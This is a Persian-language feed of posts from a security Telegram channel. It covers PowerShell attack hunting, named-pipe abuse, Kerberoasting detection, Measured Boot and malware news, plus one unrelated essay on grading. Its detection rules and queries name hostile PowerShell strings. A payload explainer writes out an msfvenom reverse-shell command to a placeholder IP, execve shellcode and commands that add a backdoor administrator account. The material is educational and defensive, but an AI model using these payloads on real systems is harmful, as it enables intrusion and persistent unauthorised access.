نقش ها و مسوولیت ها در تیم CTI

https://readmedium.com/the-cti-team-roles-and-responsibilities-you-need-bdd3c03f781e

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

کاتالوگ متریک مقاومت سایبری

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

پادکستی که توسط NotebookLM گوگل برای لینک زیر تولید شد

https://medium.com/@manuel.arrieta_34860/powershell-threat-hunting-identifying-obfuscation-using-standard-deviation-9b2d9f53697f

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

پادکستی که توسط NotebookLM گوگل برای لینک زیر تولید شد

https://www.googlecloudcommunity.com/gc/Community-Blog/Consuming-Backscatter-Information-to-Perform-Threat-Hunting/ba-p/863828

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

شناسایی حمله از طریق پاورشل
به همراه اقدامات برای هانت

🟣بررسی یک حمله دم دستی

امروز میخوام بجای یک ایده جدید ، یه حمله تیپیکال که در SOC میبینید رو با هم مرور کنیم.

📌 سناریو:

یک مهاجم از طریق PowerShell اقدام به اجرای یک fileless attack در شبکه سازمان کرده است. SOC یک هشدار دریافت کرده که نشان می‌دهد یک فرآیند مشکوک PowerShell با پارامترهای مبهم‌سازی‌شده (obfuscated) اجرا شده است.

🔆هدف ما:

شناسایی حمله با بررسی لاگ‌های PowerShell.
بررسی ارتباطات شبکه‌ای مخرب.
استخراج payload مخرب از حافظه.
تحلیل بدافزار و روش‌های آن.
ارائه راهکارهای مقابله و همچنین شکار تهدید برای جلوگیری از حملات مشابه در آینده و کشف های جدید

🔍 ۱. بررسی اولیه هشدار و کشف فرآیند مشکوک

فرآیند powershell.exe با پارامترهای زیر اجرا شده است:

powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgA

این مقدار Base64 encoded است. برای رمزگشایی، در PowerShell دستور زیر را اجرا می‌کنیم:

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SQBFAFgA"))

📌 نتیجه: این مقدار به دستور Invoke-Expression (IEX) تبدیل می‌شود، که نشانه‌ای از اجرای یک کد از راه دور است.
🔍 ۲. جستجوی فرآیندهای مشکوک در اسپلانک

index=windows EventCode=4104 | search "IEX(" OR "DownloadString(" OR "Convert.FromBase64String("

📌 نتیجه: مشاهده چندین اجرای مشکوک از PowerShell همراه با DownloadString که نشان‌دهنده دانلود payload از اینترنت است.
🔍 ۳. بررسی ارتباطات شبکه‌ای مشکوک

برای بررسی اینکه PowerShell به چه دامنه‌هایی متصل شده، از netstat استفاده می‌کنیم:

Get-NetTCPConnection | Where-Object { $_.RemoteAddress -like "*.*.*.*" }

📌 نتیجه: مشاهده یک ارتباط به http://malicious[.]domain/payload.ps1

✅ گام بعدی: استفاده از Wireshark برای مشاهده ترافیک HTTP و استخراج داده‌ها:

http.request.full_uri contains "malicious[.]domain"

📌 نتیجه: مهاجم در حال دانلود یک payload مخرب است.
🔍 ۴. استخراج کد مخرب از حافظه برای تحلیل بیشتر

از ابزار Volatility برای بررسی فرآیند powershell.exe و استخراج کد استفاده می‌کنیم:

volatility -f memory.dmp --profile=Win10x64 procdump -p 1234 -D output/

📌 نتیجه: مشاهده کدی که در حافظه لود شده است. این کد شامل یک Reflective DLL Injection می‌باشد.

🔹 آنالیز بیشتر با YARA برای بررسی رفتار کد استخراج‌شده:

rule Suspicious_PowerShell {
meta:
denoscription = "Detects obfuscated PowerShell payloads"
strings:
$a = "IEX("
$b = "DownloadString"
$c = "System.Reflection.Assembly::Load"
condition:
any of ($a,$b,$c)
}

📌 نتیجه: این کد دارای قابلیت اجرای Reflective DLL Injection است، که در حملات APT به‌کار می‌رود.
🔍 ۵. تحلیل پیشرفته‌تر با Sysmon برای شناسایی رفتار مهاجم

ابزار Sysmon یکی از بهترین ابزارها برای شکار رفتارهای مخرب PowerShell است. برای بررسی، از sysmon -c خروجی می‌گیریم:

Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Select-String "powershell.exe"

📌 نتیجه: مشاهده Event ID 1 (Process Creation) که نشان می‌دهد PowerShell با پارامترهای مشکوک اجرا شده است.

✅ گام بعدی:

ساخت یک قانون Sigma برای شناسایی اجرای مشابه در آینده:

noscript: Suspicious PowerShell Execution
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- "NoP -NonI -ExecutionPolicy Bypass"
- "IEX("
- "DownloadString("
condition: selection

📌 مزیت:
🚨 هر زمان که دستورات مشابه اجرا شود، یک هشدار در SIEM ایجاد خواهد شد.
🎯 نتیجه‌گیری و اقدامات برای جلوگیری از حملات مشابه
✅ اقدامات شکار تهدید (Threat Hunting Actions)

✔️ مانیتورینگ Event ID 4104 در SIEM برای شناسایی اجرای اسکریپت‌های مشکوک.
✔️ تحلیل ارتباطات شبکه‌ای با Wireshark برای تشخیص دامنه‌های مخرب.
✔️ استخراج و تحلیل payload از حافظه با Volatility برای بررسی روش‌های مهاجم.
✔️ ایجاد قوانین YARA و Sigma برای تشخیص اجرای کدهای مخرب.
✔️ استفاده از Sysmon برای نظارت بر اجرای فرآیندهای PowerShell

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#امنیت_به_زبان_ساده

⏮️پی‌لود (Payload) چیست؟

در زمینه‌ی امنیت سایبری و اکسپلویت‌ها، پی‌لود (Payload) به بخشی از یک کد مخرب گفته می‌شود که پس از بهره‌برداری (Exploit) از یک آسیب‌پذیری ؛ اجرا می‌شود.
به عبارت دیگر، پی‌لود همان محتوای اصلی حمله است که هدفش انجام یک عملیات خاص روی سیستم قربانی است، مانند اجرای یک Shellcode، دانلود بدافزار، ایجاد درب پشتی (Backdoor) یا سرقت داده‌ها.

🟪مثال‌های پی‌لود

☑️اجرای یک معکوس شل (Reverse Shell)
در این روش، مهاجم پس از نفوذ به سیستم، پی‌لودی را اجرا می‌کند که یک ارتباط معکوس به سمت مهاجم باز کند. مثلاً در Metasploit، می‌توان از این پی‌لود استفاده کرد:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

یعنی پس از نفوذ اولیه ؛ این پی‌لود یک Meterpreter Reverse Shell ایجاد می‌کند که پس از اجرا روی سیستم قربانی، به آدرس IP مهاجم متصل شده و دستورات را از راه دور اجرا می‌کند. ( تمرینی در درس سنز ۵۰۴)

☑️استفاده از Shellcode برای اجرای یک دستور ساده
اگر بخواهیم پی‌لودی که فقط یک دستور ساده روی سیستم اجرا کند، مثال زیر را در Assembly x86 داریم:

section .text
global _start

_start:
xor eax, eax
push eax
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
mov ebx, esp
push eax
mov edx, eax
mov ecx, eax
mov al, 0xb ; syscall execve
int 0x80

این کد یک Shellcode ساده است که /bin/sh را اجرا می‌کند.

☑️درج یک درب‌پشتی در سیستم قربانی
اگر مهاجم بخواهد پس از نفوذ به سیستم، یک درب‌پشتی دائمی ایجاد کند، ممکن است پی‌لودی بسازد که یک کاربر جدید اضافه کند:

net user hacker Pass123 /add
net localgroup administrators hacker /add

این دستورات، یک کاربر جدید به نام "hacker" را ایجاد کرده و آن را به گروه مدیران اضافه می‌کنند.

✳️نتیجه‌گیری

پی‌لود بخش اصلی یک حمله‌ی سایبری است و می‌تواند کارهای مختلفی انجام دهد، از اجرای یک شل ساده گرفته تا دانلود و اجرای بدافزارهای پیچیده. در تست نفوذ و امنیت سایبری، شبیه‌سازی پی‌لودها برای ارزیابی امنیت سیستم‌ها امری رایج است.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

پیاده‌سازی تست برای آزمایش رولهای کشفی

This solution will allow you to easily deploy an entire lab to create/test your detection rules, simulate logs, play tests, download and run malware and mitre attack techniques, restore the sandbox and many other features.

https://github.com/Krook9d/PurpleLab

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

به زبان ساده Named Pipeچیست؟

یک Named Pipe یک روش برای ارتباط بین دو برنامه یا پردازش در ویندوز است، مثل یک کانال مخفی بین دو نفر که فقط خودشان می‌دانند از آن استفاده کنند.
مثال:
فرض کن یک برنامه‌ی چت داری که دو نفر از طریق آن پیام رد و بدل می‌کنند. اگر به جای استفاده از اینترنت، این دو نفر در یک اتاق مخفی باشند و فقط از یک لوله‌ی پلاستیکی برای حرف زدن استفاده کنند، این همان Named Pipe است!

هکر چطور از Named Pipe سوءاستفاده می‌کند؟
هکرها از Named Pipe برای ارتباط مخفیانه بین پردازش‌های مخرب خود استفاده می‌کنند.

چند روش رایج:

✴️اجرای دستورات از راه دور (Lateral Movement)
هکر روی یک کامپیوتر دسترسی گرفته و می‌خواهد به کامپیوتر دیگر در همان شبکه دستور بفرستد.
از Named Pipe برای ارسال فرامین به یک پروسه‌ی مخرب در کامپیوتر دیگر استفاده می‌کند.
ابزار Cobalt Strike و Metasploit از این روش زیاد استفاده می‌کنند.
✴️مخفی‌کردن ارتباطات بین بدافزارها
بدافزار اصلی، یک Named Pipe ایجاد می‌کند و یک برنامه‌ی دیگر را مجبور می‌کند که از طریق این Pipe اطلاعات را منتقل کند.
به این روش، "Command and Control (C2) مخفی" می‌گویند.

✴️دور زدن فایروال و آنتی‌ویروس
چون Named Pipe در داخل خود سیستم‌عامل اجرا می‌شود، خیلی از فایروال‌ها و آنتی‌ویروس‌ها متوجه آن نمی‌شوند.
مهاجم می‌تواند بدون ارسال داده به اینترنت، اطلاعات را بین دو پروسه رد و بدل کند.
✴️افزایش سطح دسترسی (Privilege Escalation)
بعضی برنامه‌ها از Named Pipe برای دستورات مدیریتی (Admin) استفاده می‌کنند.
هکر می‌تواند یک Pipe جعلی با نام مشابه ایجاد کند و سیستم را فریب دهد تا دستورات حساس را به جای برنامه‌ی اصلی، به هکر ارسال کند.


چگونه می‌توان جلوی این سوءاستفاده را گرفت؟

✅ پایش (Monitoring) و ثبت لاگ (Logging) → با Sysmon و Event Tracing for Windows (ETW) فعالیت‌های مشکوک Named Pipe را شناسایی کنید.
✅ محدود کردن دسترسی‌ها → فقط برنامه‌های مشخص بتوانند از Named Pipe استفاده کنند.
✅ بررسی رفتار غیرعادی پردازش‌ها → اگر یک پردازش مشکوک یک Named Pipe ایجاد کرد و از طریق آن کد اجرا شد، احتمال حمله وجود دارد.

🟣نتیجه:
هکر از Named Pipe به عنوان یک تونل مخفی برای ارتباط بین بدافزارها، اجرای دستورات از راه دور و دور زدن آنتی‌ویروس استفاده می‌کند. اگر در SOC فعالیت‌های Named Pipe را بررسی نکنید، ممکن است مهاجم به راحتی در شبکه حرکت کند بدون اینکه شناسایی شود.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

از مقولات مدرن در معماری امنیت
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

ادامه از قبلی

چگونه Named Pipe را در SOC پایش کنیم؟

۱. فعال کردن Sysmon برای لاگ کردن Pipe‌های مشکوک

    Event ID 17: ایجاد Named Pipe
    Event ID 18: اتصال به Named Pipe
    Event ID 3: فعالیت شبکه‌ای مرتبط با Pipe

✅ مثال از لاگ Sysmon:

Event ID: 17
Pipe Name: \\.\pipe\malicious_pipe
Process: C:\Windows\Temp\malware.exe

۲. بررسی Sessionهای غیرمعمول

    اگر یک Pipe خارج از Session 0 اجرا شد، بررسی کنید که چرا!
     دستورquser را در PowerShell اجرا کن تا ببینی Pipe در چه Sessionی باز شده است.

۳. مقایسه Pipeهای جدید با لیست Pipeهای مجاز

   این Pipeهای سیستمی مجاز را لیست کن و Pipeهای جدید را بررسی کنید

۴. نظارت بر ارتباطات غیرعادی بین پردازش‌ها

    مثلا، اگر Explorer.exe به Named Pipe یک پردازش مشکوک متصل شود، باید بررسی شود.

جمع‌بندی: Named Pipe، یک تونل مخفی برای مهاجمان

✅ مهاجمان از Named Pipe برای اجرای کد از راه دور، مخفی کردن ارتباطات، دور زدن آنتی‌ویروس و افزایش دسترسی استفاده می‌کنند.
✅ اگر در SOC کار می‌کنید، باید Named Pipe را لاگ و بررسی کنید، چون یک تکنیک محبوب در بدافزارها و حملات APT است.

کوئری اسپلانک

index=windows EventCode=17 OR EventCode=18 
| eval pipe_name=lower(PipeName) 
| search NOT pipe_name IN ("\\.\pipe\spoolss", "\\.\pipe\lsass", "\\.\pipe\netlogon") 
| table _time, Host, ProcessID, Image, PipeName, EventCode 
| sort - _time


🔍 این کوئری چه کار می‌کند؟
✔️ لاگ‌های ایجاد یا اتصال Named Pipe را فیلتر می‌کند.
✔️این Pipeهای سیستمی قانونی را حذف می‌کند (مثل \spoolss و \lsass).
✔️ نتایج را به‌صورت جدول زمانی مرتب‌شده نمایش می‌دهد.
شناسایی استفاده مشکوک از Named Pipe در شبکه

اگر مهاجم با PsExec یا Cobalt Strike از Named Pipe استفاده کند، معمولاً Pipeهای ناشناخته و غیرمعمول ایجاد می‌شوند. با این کوئری می‌توانید Pipeهایی که بین دو سیستم به کار رفته را پیدا کنید :
index=windows EventCode=3 (Protocol=NamedPipe) 
| stats count by PipeName, SourceHost, DestinationHost 
| sort - count

✔️ این کوئری Pipeهایی که بین دو کامپیوتر استفاده شده‌اند را نمایش می‌دهد.
✔️ اگر Pipe ناشناخته‌ای بین دو سیستم مهم بانکی باشد، بررسی دقیق لازم است!

برخی بدافزارهای معروف از نام‌های خاصی برای Pipe استفاده می‌کنند، مثل:

    \\.\pipe\mspipe (Cobalt Strike)
    \\.\pipe\remcom (PsExec)
    \\.\pipe\postex (Meterpreter)

📌 برای پیدا کردن این موارد در Splunk:
index=windows EventCode=17 OR EventCode=18 
| search PipeName IN ("\\.\pipe\mspipe", "\\.\pipe\remcom", "\\.\pipe\postex") 
| table _time, Host, PipeName, Image

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

بازیابی دستورات درهم ریخته ی پاورشل

پیشرفته
https://vikas-singh.notion.site/Mastering-PowerShell-De-obfuscation-Beyond-the-Basics-198b0f0bbd7e801880c5c13d7f11200b

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

مقاله شاخص روز در زمینه معماری ویندوز

https://techcommunity.microsoft.com/blog/microsoft-security-blog/evolving-the-windows-user-model-%E2%80%93-introducing-administrator-protection/4370453

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

گزارش DFIR روز

https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

جاب آفرهایی که به حمله ی باج افزاری منتهی می‌شوند

مراقب باشید

https://www.seqrite.com/blog/xelera-ransomware-fake-fci-job-offers/

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

اخبار مهم روز

در نوامبر ۲۰۲۴، محققان امنیتی از کمپینی مخرب پرده برداشتند که وزارت امور خارجه یک کشور ناشناس در آمریکای جنوبی را هدف قرار داده بود. این کمپین که توسط Elastic Security Labs با نام REF7707 ردیابی می‌شود و شامل بدافزاری سفارشی است که دسترسی از راه دور به سیستم‌های آلوده را فراهم می‌کند. علاوه بر این، اهداف دیگری مانند یک شرکت مخابراتی و یک دانشگاه در جنوب شرقی آسیا نیز شناسایی شده‌اند.

اگرچه روش دقیق دسترسی اولیه در این حملات مشخص نیست، اما مشاهده شده است که مهاجمان از ابزار «certutil» مایکروسافت برای دانلود payloadهای اضافی از سروری مرتبط با وزارت امور خارجه استفاده کرده‌اند. دستورات certutil از طریق پلاگین Remote Shell مدیریت از راه دور ویندوز (WinrsHost.exe) از سیستمی ناشناخته در شبکه اجرا شده‌اند. این امر نشان می‌دهد که مهاجمان قبلاً به اعتبارنامه‌های شبکه دسترسی داشته و از آن‌ها برای حرکت جانبی از یک میزبان قبلاً آلوده در محیط استفاده کرده‌اند.

اولین فایل اجرایی، بدافزاری به نام PATHLOADER است که امکان اجرای shellcode رمزگذاری‌شده دریافتی از سرور خارجی را فراهم می‌کند. سپس، shellcode استخراج‌شده با نام FINALDRAFT به حافظه یک فرآیند جدید «mspaint.exe» تزریق می‌شود.

این FINALDRAFT، نوشته‌شده به زبان C++، یک ابزار مدیریت از راه دور کامل است که قابلیت اجرای ماژول‌های اضافی به‌صورت پویا را دارد و از سرویس ایمیل Outlook از طریق Microsoft Graph API برای فرمان و کنترل (C2) سوءاستفاده می‌کند. این بدافزار با تجزیه دستورات ذخیره‌شده در پوشه پیش‌نویس‌های صندوق پستی و نوشتن نتایج اجرا در ایمیل‌های پیش‌نویس جدید برای هر دستور، ارتباط برقرار می‌کند. FINALDRAFT دارای ۳۷ فرمان است که شامل تزریق فرآیند، دستکاری فایل و قابلیت‌های پروکسی شبکه می‌شود.

همچنین، این بدافزار به گونه‌ای طراحی شده است که فرآیندهای جدیدی را با استفاده از هش‌های NTLM سرقت‌شده شروع کرده و دستورات PowerShell را به‌گونه‌ای اجرا می‌کند که فایل اجرایی «powershell.exe» را فراخوانی نکند. در عوض، با پچ کردن چندین API برای دور زدن ردیابی رویداد برای ویندوز (ETW)، ابزار PowerPick را که بخشی از کیت ابزار پس از بهره‌برداری Empire است، راه‌اندازی می‌کند.

علاوه بر این، نمونه‌های باینری ELF که در VirusTotal از برزیل و ایالات متحده آپلود شده‌اند، نشان‌دهنده وجود نسخه لینوکس FINALDRAFT هستند که دارای عملکرد C2 مشابهی است. نسخه لینوکس می‌تواند دستورات شل را از طریق «popen» اجرا کرده و خود را از سیستم حذف کند.

کامل بودن ابزارها و سطح مهندسی درگیر نشان می‌دهد که توسعه‌دهندگان به‌خوبی سازمان‌دهی شده‌اند. مدت زمان طولانی عملیات و شواهد به‌دست‌آمده از تله‌متری نشان می‌دهد که احتمالاً این کمپین با هدف جاسوسی انجام شده است.

این کشف نشان‌دهنده پیچیدگی فزاینده تهدیدات سایبری و اهمیت اقدامات امنیتی قوی برای محافظت از سازمان‌ها در برابر چنین حملاتی است. سازمان‌ها باید به‌طور منظم سیستم‌های خود را به‌روزرسانی کرده، از ابزارهای امنیتی پیشرفته استفاده کنند و کارکنان خود را در مورد شیوه‌های امنیتی مناسب آموزش دهند تا خطر نقض امنیتی را به حداقل برسانند

https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html?m=1

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

مقایسه‌ای از نمره قبولی در دانشگاه‌های آمریکا و ایران
◾️چند وقتی هست که با خودم فکر می‌کنم چرا در ایران نمره‌ی ۱۰ معیاری قرار گرفته برای پاس کردن دروس، آن هم در دوره مهم کارشناسی که باید مفاهیم تخصصی بصورت بنیادی آموزش داده شود. چرا اگر دانشجو صرفا ۵۰٪ از انتظارات را برآورده کرده باشد نظام آموزشی ما آن را قابل قبول می‌داند؟ مقداری جستجو کردم ولی دلیلی پیدا نکردم غیر از اینکه بعضی کشورهای دیگر مثل هند، پاکستان و البته انگلیس از معیار مشابهی استفاده می‌کنند. این برای من خصوصا جالب است چون که در آمریکا، اگرچه سیستم یکپارچه‌ای وجود ندارد، اما نمره‌ی قبولی در دوره کارشناسی برای دروس تخصصی عموما -C است و اگرچه اساتید در تعریف درصدها تا حدی اختیار دارند، اغلب ۷۰٪ بعنوان -C در نظر گرفته می‌شود. دانشجو اگر‌ نمره F بگیرید، که معمولا عملکرد زیر ۶۰٪ است، نمره صفر در کارنامه دریافت می‌کند!
◾️در نظر گرفتن ۵۰٪ بجای ۷۰٪ بعنوان شاخص قبولی مزایایی دارد از جمله آنکه فشار و استرس را بر دانشجو کمتر می‌کند. اما آیا این مساله تاثیری فراتر از نظام آموزشی ندارد؟ سوالی که برای من ایجاد شده این است که آیا در بلندمدت این باعث نشده تعریف ما از موفقیت و روش‌های سنجش آن متفاوت باشد و در کارهای شخصی، روابط اجتماعی و حتی پروژه‌های تخصصی و فنی هم بر این باور باشیم که اگر نصف مسیر را طی کنیم همچنان قابل قبول است؟ آیا این باعث نمی‌شود متخصص ما از نیمه راه جای پای خود را سفت ببیند در حالی که متخصص آمریکایی با تعریف متفاوتی از موفقیت آموزش دیده است؟
◾️من راجع به سوالات بالا قطعیتی ندارم اما فکر می‌کنم ما حتی اگر روزی زیرساخت‌های مدرن آموزش عالی را داشته باشیم، حتی اگر همه‌ی کارهایمان سر و شکل اصولی بگیرد، باز هم باید وقت بگذاريم و به جزئیات با دقت فکر کنیم. یک کل منسجم و کارآمد از جزئیات فکر شده می‌آید و شاید همین مسائل بسیار کوچک و بظاهر کم اهمیت سبب بخشی از تفاوت ما در کارآیی و بازدهی شده باشد.


✍️دکتر مسعود قدرت آبادی
ساکرامنتو - کالیفرنیا

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🚨ابزار روز

KrbRelayEx is a tool designed for performing Man-in-the-Middle (MitM) attacks by relaying Kerberos AP-REQ tickets. It listens for incoming SMB connections and forwards the AP-REQ to the target host, enabling access to SMB shares or HTTP ADCS (Active Directory Certificate Services) endpoints on behalf of the targeted identity.

✅شرح مساله :

تیکت AP-REQ ‌که در ابزار نفوذ فوق بدان اشاره شده است ؛در پروتکل احراز هویت Kerberos بخشی از فرایند احراز هویت سرویس‌گیرنده به سرویس موردنظر است. این تیکت شامل اطلاعاتی است که به سرور مقصد اجازه می‌دهد هویت کلاینت را تأیید کند.
فرایند صدور و استفاده از AP-REQ

دریافت تیکت TGS (تیکت سرویس) از TGS
کلاینت پس از احراز هویت اولیه، از Ticket Granting Server (TGS) یک تیکت برای دسترسی به سرویس خاصی دریافت می‌کند.
این تیکت با کلید سرویس رمزگذاری شده است، بنابراین فقط سرور مقصد می‌تواند آن را باز کند.

ارسال AP-REQ به سرور سرویس
کلاینت هنگام درخواست دسترسی به یک سرویس (مانند SMB یا HTTP)، تیکت TGS را به همراه یک Authenticator به سرور مقصد ارسال می‌کند.
این مجموعه به عنوان AP-REQ (Authentication Protocol Request) شناخته می‌شود.

اعتبارسنجی توسط سرور سرویس
سرور سرویس تیکت TGS را رمزگشایی می‌کند و اعتبار کلاینت را بررسی می‌نماید.
در صورت معتبر بودن تیکت و زمان آن، کلاینت احراز هویت شده و به سرویس موردنظر دسترسی می‌یابد.

ساختار AP-REQ

توضیح Authenticator: شامل اطلاعات زمانی و کلید نشست است تا از حملات بازپخش جلوگیری شود.
توضیح Ticket: شامل اطلاعات رمزگذاری‌شده از جمله نام کاربری و مدت اعتبار است.

نقاط ضعف احتمالی

حمله Relay Attack: مهاجمان می‌توانند AP-REQ را رهگیری و به سرور دیگری رله کنند، که یکی از پایه‌های حملات Kerberos Relay مانند حمله KrbRelayEx است.
حمله Pass-the-Ticket (PtT): در این حمله، مهاجم می‌تواند تیکت را سرقت کرده و از آن برای دسترسی غیرمجاز استفاده کند.

به همین دلیل، پروتکل‌های امنیتی مانند SMB Signing و Channel Binding برای کاهش این تهدیدات پیشنهاد می‌شوند.

https://github.com/decoder-it/KrbRelayEx

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

بررسی استفاده از ابزار Performance Monitor (PerfMon) در تشخیص حملات مرتبط با Active Directory

نویسنده با تأکید بر اهمیت نظارت بر رویدادهای Active Directory، نشان می‌دهد که چگونه می‌توان با استفاده از PerfMon، حملاتی مانند Kerberoasting و AS-REP Roasting را شناسایی کرد.
در این مقاله، با استفاده از مجموعهٔ پیش‌فرض داده‌های تشخیصی Active Directory در PerfMon، رویدادهای مربوط به درخواست‌های Ticket Granting Service (TGS) که نشان‌دهندهٔ حملات Kerberoasting هستند، مورد بررسی قرار می‌گیرند. نویسنده با ارائهٔ تصاویری از نتایج به‌دست‌آمده، نشان می‌دهد که چگونه می‌توان با مشاهدهٔ تعداد زیاد درخواست‌های TGS توسط یک حساب کاربری، به وجود چنین حملاتی پی برد.

همچنین، مقاله به منابعی مانند «Kerberosity Killed the Domain: An Offensive Kerberos Overview» اشاره می‌کند که برای درک بهتر مفاهیم مرتبط با این نوع حملات مفید هستند.
در مجموع، این مقاله نشان می‌دهد که چگونه می‌توان از PerfMon برای نظارت بر رویدادهای Active Directory و شناسایی فعالیت‌های مشکوک مرتبط با حملات Kerberos استفاده کرد.

https://www.huntress.com/blog/perfmon-what-is-it-good-for

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

توضیحی بر مقاله ی فوق
و تمرین


بررسی ابزار  PerfMon برای کشف حمله کربروستینگ
فرای رویداد های  4768 و  4769

تکنیک Kerberoasting یکی از تکنیک‌های محبوب حمله در محیط‌های Active Directory (AD) است که مهاجمان از آن برای سرقت هش بلیط‌های سرویس (TGS) و کرک کردن رمزهای عبور حساب‌های سرویس استفاده می‌کنند. شناسایی این نوع حمله با ابزار Performance Monitor می‌تواند در کشف و جلوگیری از تهدیدات کمک کند.

1. مروری بر حمله Kerberoasting

مهاجم از یک حساب کاربری دامنه احراز هویت‌شده استفاده کرده و درخواست بلیط سرویس (TGS) را برای یک حساب سرویس که از رمز عبور ضعیف استفاده می‌کند، ارسال می‌کند. این بلیط سپس از حافظه استخراج و برای کرک شدن به ابزارهایی مانند Hashcat یا John the Ripper داده می‌شود.

2. چرا PerfMon برای شناسایی مفید است؟

این ابزار یک ابزار داخلی ویندوز است که داده‌های عملکردی سیستم را جمع‌آوری و نمایش می‌دهد. با استفاده از PerfMon می‌توان شاخص‌های غیرعادی مربوط به درخواست‌های TGS را نظارت کرده و فعالیت‌های مشکوک را شناسایی کرد.

3. پیکربندی PerfMon برای شناسایی Kerberoasting

3.1. اجرای Performance Monitor

3.2. ایجاد یک Data Collector Set سفارشی

در بخش Data Collector Sets، روی User Defined کلیک راست کرده و New > Data Collector Set را انتخاب کنید.

یک نام مانند Kerberoasting Detection وارد کنید و گزینه Create manually (Advanced) را انتخاب کنید.

روی Performance Counter کلیک کرده و گزینه Add را بزنید.

3.3. افزودن کانترهای مرتبط

افزودن کانترهای زیر به تشخیص رفتار مشکوک کمک می‌کند:

Security System-Wide Statistics > Ticket Granting Service Requests

Security System-Wide Statistics > Kerberos Authentications

3.4. تنظیم Alert برای فعالیت غیرعادی

در Performance Monitor، به Alerts بروید

مقدار آستانه  را برای TGS Requests روی مقدار غیرمعمول بالا تنظیم کنید (مثلاً بیش از 100 در یک دقیقه).

یک Action تعریف کنید که در صورت عبور از این مقدار، هشدار ارسال شود.

4. تحلیل نتایج و تشخیص فعالیت‌های مشکوک

بعد از اجرای PerfMon، تیم امنیتی می‌تواند گزارش‌های ذخیره‌شده را تجزیه‌وتحلیل کند:

افزایش درخواست‌های TGS: اگر تعداد درخواست‌ها افزایش پیدا کند، ممکن است نشانه‌ای از حمله باشد.

درخواست‌های زیاد از یک حساب کاربری خاص: اگر یک حساب معمولی (نه حساب سرویس) تعداد زیادی درخواست TGS ارسال کند، احتمال حمله افزایش می‌یابد.

درخواست‌های متعدد برای بلیط‌های حساب‌های حساس: مهاجمان اغلب به دنبال حساب‌های سطح بالا یا سرویس‌های حیاتی هستند.

5. اقدامات اصلاحی در برابر این حمله

در صورت شناسایی رفتار مشکوک، مراحل زیر را انجام دهید:

بررسی لاگ‌های امنیتی در Event Viewer: به مسیر Windows Logs > Security رفته و Event ID 4769 را بررسی کنید.

فعال کردن حسابرسی Kerberos در Group Policy: مسیر Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration را باز کنید و گزینه Audit Kerberos Authentication Service را فعال کنید.

استفاده از رمزهای عبور قوی برای سرویسها: از حساب‌های مدیریت‌شده (gMSA) استفاده کنید تا رمزهای عبور به‌طور خودکار تغییر کنند.

محدود کردن استفاده از حساب‌های دارای SPN: آنها که نیازی به SPN ندارند را بررسی کرده و حذف کنید.

نصب ابزارهای امنیتی مکمل:  SIEM و EDR

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

در SOC استفاده کنید: Measured Boot
کشف نفوذ در عمق🔴


این Measured Boot چیست و چگونه جلوی نفوذ را می‌گیرد؟
این موضوع یکی از قابلیت‌های امنیتی در TPM 2.0 است که به سیستم‌عامل و ابزارهای امنیتی مانند EDR/XDR یا SIEM (مثل Splunk) کمک می‌کند تا تغییرات در فرآیند بوت را شناسایی کنند.

✅ عملکرد Measured Boot:

هر مرحله از بوت توسط TPM هش شده و در PCR (Platform Configuration Registers) ذخیره می‌شود.
این مقادیر هش در SIEM یا EDR/XDR ارسال می‌شوند و بررسی می‌شود که آیا تغییری رخ داده است یا خیر.
اگر مقدار هش با مقدار مورد انتظار تطابق نداشته باشد، یعنی یک Bootkit، Rootkit، یا تغییر غیرمجاز در Bootloader یا کرنل رخ داده است.

🔹 نکته مهم:Measured Boot نمی‌تواند جلوی نفوذ را بگیرد، اما آن را شناسایی کرده و به SIEM/EDR هشدار می‌دهد.
🔹 در ترکیب با Secure Boot و TPM Attestation، می‌تواند جلوی اجرای بوت‌لودرهای غیرمجاز را هم بگیرد.


❇️استفاده از Measured Boot در Splunk برای کشف نفوذ

هدف: بررسی لاگ‌های Measured Boot در Splunk و تشخیص Bootkits یا Rootkits.

1. فعال‌سازی لاگ‌های Measured Boot در ویندوز

✅ مطمئن شوید که TPM و Secure Boot فعال هستند.
✅ این Windows Event Logging را برای Measured Boot فعال کنید:

Group Policy Editor را باز کنید:

Computer Configuration -> Administrative Templates -> System -> Trusted Platform Module Services

گزینه Turn on TPM Services Logging را فعال کنید.
و Reboot کنید تا تنظیمات اعمال شوند.

2. ارسال لاگ‌های Measured Boot به Splunk

این Splunk می‌تواند لاگ‌های مربوط به TPM و Measured Boot را جمع‌آوری کند.

✅ منبع لاگ‌ها در ویندوز:

Windows Logs -> Security -> Event ID 4912 (Measured Boot Logs)

✅ منبع لاگ‌ها در لینوکس:

/sys/kernel/security/tpm0/binary_bios_measurements

💡 اضافه کردن این لاگ‌ها به Splunk:

پیکربندی Universal Forwarder در Splunk:

splunk add monitor "C:\Windows\System32\winevt\Logs\Security.evtx" -sourcetype winlog

